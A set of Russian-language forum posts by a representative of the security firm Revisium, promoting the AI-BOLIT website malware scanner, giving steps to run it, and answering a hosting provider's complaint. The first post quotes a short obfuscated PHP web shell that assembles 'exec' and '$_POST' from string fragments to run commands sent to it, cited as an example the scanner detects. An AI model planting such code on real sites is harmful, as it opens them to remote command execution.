gregzem

$a = 'ex';

$b = 'ec';

$c = $a.$b;

$d = '_PO';

$e = 'ST';

$f = $d.$e;

$g = $$f;

$c($g['q']);

Никто не утверждает, что написать сканер - это легко ). Вот мы уже три года его пишем, постоянно улучшая.

Свежая версия определяет в режиме "параноидальный" том числе и такие шеллы. Думаю, AI-BOLIT - единственный сканер, который умеет определять вредоносный код в косвенных вызовах.

Конечно, всегда можно придумать вариант, который не будет детектится. Но у разработчиков вредоносного кода не всегда богатая фантазия. Да и мы постоянно расширяем базу сигнатур.

Через ssh на виртуальном хостинге тоже скорее всего обрубят. Если на VDS/VPS - то отработает. Поэтому старый добрый проверенный вариант на локалке http://www.revisium.com/kb/scan_site_windows.html

Самый простой вариант:

1. загрузите файл ai-bolit.php в корневой каталог вашего сайта

2. откройте его в браузере http://сайт/ai-bolit.php

3. он вам предложит случайный пароль в сообщении о том, что надо бы запускать его с паролем

4. скопируйте этот пароль в буфер, откройте на редактирование файл ai-bolit.php, найдите строку

define('PASS','что-то-написано');

5. вставьте вместо 'что-то-написано' скопированный пароль, например,

define('PASS','kprjmMhCK');

6. сохраните изменения на хостинге

7. откройте скрипт http://сайт/ai-bolit.php?p=kprjmMhCK

ну или тот пароль, который впишете туда. А если на сайте проверить не получится, делайте по этой инструкции и проверяйте локально на своем компьютере: http://www.revisium.com/kb/scan_site_windows.html

Здравствуйте, еще раз.

в первом посте было много про "кидалово" и намерение навердить клиенту. Я подробно ответил, почему это не так. Еще раз повторю - мы работаем давно, клиентоориентированы и наша цель помочь, а не навредить клиенту. Отзывы можно посмотреть на разных сайтах (включая наш, хотя ему скорее всего никто не поверит). За шесть лет работы через нас прошло очень много сайтов с очень многих хостингов. Два или три раза раза были ошибки в работе, связанные с ошибкой специалиста, которые исправлялись в течение короткого промежутка времени. Ни одного сайта не пострадало.

Вы правы, частично мы сисадмины. Но это касается связки веб-сервер, php, cms, файловая система.

---------- Добавлено 05.06.2014 в 12:43 ----------

Это поддерживаю. Это разумно и по делу.

Официальный комментарий дан.

Добрый день,

Я представляю компанию "Ревизиум" и готов ответить на вопросы, замечания, предложения и критику.

Их можно задать мне в личку, в теме форума или по email.

То, что я вижу в данном посте - это превалирование субъективной эмоциональной составляющей над объективными фактами. К сожалению, не знаком с автором топика, но хочется верить, что это не руководитель хостинга, так как руководитель в первую очередь пытается спокойно разобраться в ситуации, причем "внутри любовного треугольника" хостер - клиент - исполнитель услуг, не вынося сор наружу. Причем, опять же хороший руководитель старается вести свою деятельность с прицелом на рост прибыли компании. И клиентоориентированность здесь, пожалуй, одно из самых важных направлений, учитывая, что хостинг - это сервис.

Резюмируя сказанное, было бы более профессионально разрешить все недовольства, пообщавшись лично, тем более что все контакты, включая телефон, есть на сайте http://www.revisium.com и написать или позвонить нам не составляет никакого труда. Более того, мы бы разобрались в ситуации намного быстрее и продуктивнее.

Учитывая три участника данного взаимодействия, конечно, сейчас очень просто тыкать пальцем друг на друга, обвиняя в том, что кто-то что-то кому-то не сообщил, не вовремя или неверную информацию, изначально напортачил с настройками dns или разместил дополнительные настройки в .htaccess для повышения уровня безопасности, что вывело из строя на несколько минут, а затем вернуло в строй 2 сайта клиента. Поэтому сложно разобраться в сути, назовем его, "инцидента". И уж тем более, когда он так эмоционально подан как намеренное членовредительство и активно поддержан армией "поддакивателей". Кстати, важный момент, который еще предстоит выяснить - каким образом содержание конфиденциального отчета попало в открытый доступ. За это мы юридически наказываем.

Мы в компании "Ревизиум" заботимся о благополучии клиентов, делая их сайты безопасными и защищенными. Цель нашей услуги - обеспечить клиенту максимально защищенный от взлома сайт в трех аспектах: средствами cms, хостинга и обучением безопасной работы с сайтом (именно поэтому мы делаем бесплатные вебинары по безопасности для владельцев сайтов и выступаем на профильных конференциях).

Так уж получилось, но в данный момент AI-BOLIT является самым качественным сканером вредоносного кода на сайте (любой может взять и убедиться в этом, проверив взломанный сайт несколькими сканерами и сравнив результат). Потому что мы взяли очень узкое направление инфобезопасности, связанной именно с сайтами и сконцентрировались только на нем (мы не сисадмины, не сео- и не веб-студия), все, чем мы занимаемся - это лечение и защита сайтов от взлома. И да, мы действительно делаем свою работу профессионально, сотрудничаем с крупными хостингами, студиями и веб-мастерами, обеспечивая безопасность сайтов их клиентов.

Уверяю вас, что интересы клиента для нас на первом месте. Именно в этом ключе нужно рассматривать отчет.

У нас нет никаких реферальских партнерских программ ни с одним хостингом (хотя некоторые нам их предлагали), мы не получаем выгоду от перехода клиента с одного хостинга на другой. Более того, мы получаем дополнительные расходы, так как процедуру установки защиты приходится выполнять повторно. Если мы кого-то рекомендуем, то только потому что эти хостинг-компании предоставляют все необходимые инструменты для гибкой настройки сайта, что важно в том числе и для повышения уровня безопасности (нет фаворитов, есть полтора десятка рекомендуемых, которых мы просто в произвольном порядке указываем). На самом деле мы также как и сам хостер, заинтересованы в сохранении текущего хостинга клиента.

Так сложилось, что у крупных хостингов более богатый выбор возможностей в плане настроек на аккаунте (всегда есть ssh, можно манипулировать настройками php.ini, устанавливать авторизацию

на директории прямо из панели и т.п.) и все это не требует навыков администрирования и работы с командной строкой и активируется непосредственно через панель управления. Поэтому, если хостер поставит себя на место клиента, которому нужно "затянуть гайки" на его аккаунте, чтобы сайт не одолели хакеры и вирусы, и при этом иметь возможность эти гайки временами оперативно ослаблять, он поймет, почему переезд к более функциональному хостеру с более удобным интерфейсом для управления за те же деньги становится целесообразным. У небольших хостеров и реселлеров бывает, что и гаек-то никаких нет, все предоставляется "как есть" без возможности изменения, либо требует нескольких итераций в общении с тех поддержкой, которые могут длиться ни одни сутки. Но, редко кто ставит себя на место клиента.

Благодарю за внимание, желаю всем хостерам больше лояльных клиентов, безопасности и бесперебойной работы серверов. Готов пообщаться лично с представителем хостеров с целью повышения защищенности сайтов клиентов, сокращения кол-ва взломов. Готовы проконсультировать абсолютно бесплатно по любым вопросам безопасности и защиты сайта, использованию сканера AI-BOLIT.

Напишите, пожалуйста, на audit@revisium.com с кратким описанием задачи.

У нас фиксированный прайс, зависит от cms. Информация есть на странице http://www.revisium.com/ru/order/

Благодарю. Может еще кому будет интересно:

http://live.digitaloctober.ru/embed/2993#time1400655181

(справа ссылка 10:53 - Приемы, затрудняющие обнаружение и анализ вредоносного кода в PHP – сценариях. Григорий Земсков)

Слайды доклада тут http://www.slideshare.net/revisium/php-34946983

Проверьте на наличие бэкдоров и шеллов AI-BOLIT'ом http://revisium.com/ai/, закройте админ-панель доп. серверной авторизацией (например, по IP). На самом деле много чего можно сделать из так называемой процедуры wordpress hardening, чтобы не позволить несанкционированные изменения в файлах и каталогах.